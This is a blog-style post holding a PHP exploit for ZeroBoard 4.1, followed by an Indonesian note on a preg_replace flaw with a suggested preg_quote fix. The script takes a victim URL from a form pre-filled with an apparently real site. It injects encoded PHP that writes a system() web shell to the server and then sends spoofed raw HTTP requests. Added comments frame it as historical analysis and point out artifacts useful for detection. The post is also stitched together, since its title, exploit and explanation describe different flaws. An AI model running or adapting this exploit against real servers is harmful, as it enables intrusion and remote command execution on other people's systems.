[PHP] POC + Exploit Zeroboard 4.1

chmood

author : fix
source: http://75n1.blogspot.co.id/2015/09/cookie-stealing-over-sql-injection.html



<?php
/**
* @author Jei.Friee
* @copyright 2012
*
* ZeroBoard 4.1 Exploit
*
* Historical proof-of-concept (2012), kept here for analysis of the
* vulnerability and of the artifacts it leaves behind. As the code below
* shows, the flow is: one GET to /lib.php with a crafted query string, one
* GET to /data/now_connect.php, then a hand-built POST and GET over a raw
* socket whose response is collected into $res and printed by the HTML
* footer of this page.
*/

// Silences every warning/notice, including those caused by the variables
// that are never assigned in this file ($cookie, $res) and by failed
// connections further down.
error_reporting(0);





// Query string for the lib.php request. Its REMOTE_ADDR value is bracketed
// by "*/" ... "/*", i.e. it is shaped to land inside PHP source between two
// comment markers. The chr() sequence spells fopen("./anaski.php", "w+")
// and a one-line PHP fragment wrapping system() as the written content, so a
// file named anaski.php (relative to the working directory of whatever
// script evaluates it) is the artifact to look for on an affected host.
// HTTP_SESSION_VARS / HTTP_SERVER_VARS / HTTP_ENV_VARS are the old
// register_globals-era names of the superglobal arrays.
// NOTE(review): presumably lib.php records connection data including
// REMOTE_ADDR into data/now_connect.php as PHP code and reads it from these
// overridable arrays — confirm against the ZeroBoard 4.1 source.
// The line break inside the literal between "c" and "hr(100)" looks like a
// paste artifact of this listing; it is part of the string as written.
$str = 'REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47)
.chr(97).chr(110).chr(97).chr(115).chr(107).chr(105).chr(46).chr(112).chr
(104).chr(112),chr(119).chr(43)),chr(60).
chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).
chr(36).chr(99).chr(109).c

hr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&
HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=
1&HTTP_ENV_VARS=1';

// Base URL comes straight from the "victim" GET parameter of this page.
// $uri_victim already carries "?" . $str.
$uri_victim = $_GET['victim'].'/lib.php?'.$str;

// Assigned but not referenced anywhere else in this file.
$uri_playload = $_GET['victim'].'/data/now_connect.php';

// Echoed below once the requests have been sent.
$uri_shell = $_GET['victim'].'/data/shell.php';




if(isset($_GET['victim'])) {




// First request: lib.php with the crafted query string. $str is appended a
// second time here, after a second "?".
@file_get_contents($uri_victim.'?'.$str);

// Second request: fetches data/now_connect.php.
@file_get_contents($_GET['victim'].'/data/now_connect.php');




echo "".$uri_shell."";

// Host part only, used for the socket and the Host: header.
$host = @parse_url($_GET['victim'],PHP_URL_HOST);

//echo $host;

// Plain TCP to port 80 (no TLS), 20 s connect timeout.
$fp = @fsockopen($host,'80',$errno,$errstr,20);

if($fp) {




// Hand-built HTTP/1.1 POST with an empty body ($msg is null, so
// Content-Length is 0), followed by a GET on the same keep-alive
// connection. Fixed values that a detection rule can key on: the
// MSIE 6.0/Maxthon User-Agent and "Accept-Language: zh-cn" on the POST,
// User-Agent "Lamerz" on the GET, and CLIENT-IP / X-FORWARDED-FOR both
// set to 127.0.0.1. $cookie is never assigned in this file, so the
// Cookie: header goes out empty.
$msg = null;

fputs($fp,"POST $uri_victim HTTP/1.1\r\n");

fputs($fp,"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");

fputs($fp,"Referer: $uri_victim\r\n");

fputs($fp,"Accept-Language: zh-cn\r\n");

fputs($fp,"Content-Type: application/x-www-form-urlencoded\r\n");

fputs($fp,"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)\r\n");

fputs($fp,"CLIENT-IP: 127.0.0.1\r\n");

fputs($fp,"X-FORWARDED-FOR: 127.0.0.1\r\n");

fputs($fp,"Host: $host\r\n");

fputs($fp,"Content-Length: ".strlen($msg)."\r\n");

fputs($fp,"Connection: Keep-Alive\r\n");

fputs($fp,"Cache-Control: no-cache\r\n");

fputs($fp,"Cookie: $cookie\r\n");

fputs($fp,"\r\n");

fputs($fp,$msg."\r\n");







// Second request on the same socket; "Connection: Close" ends it.
fputs($fp,"GET $uri_victim HTTP/1.1\r\n");

fputs($fp,"Host: $host\r\n");

fputs($fp,"Accept: */*\r\n");

fputs($fp,"Referer: $uri_victim\r\n");

fputs($fp,"User-Agent: Lamerz\r\n");

fputs($fp,"CLIENT-IP: 127.0.0.1\r\n");

fputs($fp,"X-FORWARDED-FOR: 127.0.0.1\r\n");

fputs($fp,"Pragma: no-cache\r\n");

fputs($fp,"Cache-Control: no-cache\r\n");

fputs($fp,"Connection: Close\r\n\r\n");
}

// Collects the raw response in 1 KiB chunks until the server closes the
// connection. $res stays undefined when the connect failed (print_r in the
// footer then prints nothing, the notice being silenced above). The socket
// is never fclose()d; it is released only at script end.
while($fp && !feof($fp)) {
$res[] = fread($fp,1024);
}

}
?>
<form method="get" action="" >
<input type="text" name="victim" size="25" value="http://leeminhothailand.com/board/" />
<input type="submit" value="Excute" name="exp" />
</form>
<pre>
<?php
// Dumps the response chunks gathered by the socket loop above; $res is only
// defined when a victim was given and the socket read loop ran at least once.
print_r($res);
?>
</pre>




Kesalahannya terdapat pada preg_replace() di include/list_check.php baris 105/106:

// Vulnerable original (include/list_check.php, lines 105/106): $keyword is
// interpolated into the PCRE pattern without escaping, so any regex
// metacharacters it contains alter the pattern, and it is interpolated into
// the HTML replacement string unescaped as well.
$keyword_pattern = "/([^<]*)$keyword([^>]*)/i" ;
$memo = preg_replace ( $keyword_pattern , "\\1<font color=FF001E style=background-color:FFF000;>$keyword</font>\\2" , $memo );



Seperti yang di atas, beberapa syntax seperti "<?php" tidak difilter.
Untuk memperbaikinya bisa menambahkan


fungsi preg_quote()


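// The proposed fix, corrected: preg_quote() has to be called outside the string
// literal and its result concatenated into the pattern (written inside the quotes,
// as on the original line, the text "preg_quote(...)" would be handed to PCRE
// literally and the function would never run). The "/" argument also escapes the
// pattern delimiter. The replacement string on the next line of list_check.php
// still inserts $keyword into HTML unescaped, so it should additionally be passed
// through htmlspecialchars() there.
$keyword_pattern = "/([^<]*)" . preg_quote($keyword, "/") . "([^>]*)/i" ;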






Mungkin saya kurang bisa menjelaskan; untuk lebih jelasnya bisa dicek di web http://pandora.sapzil.info/text/notify/20050123.zb41advisory.php




./CMIIW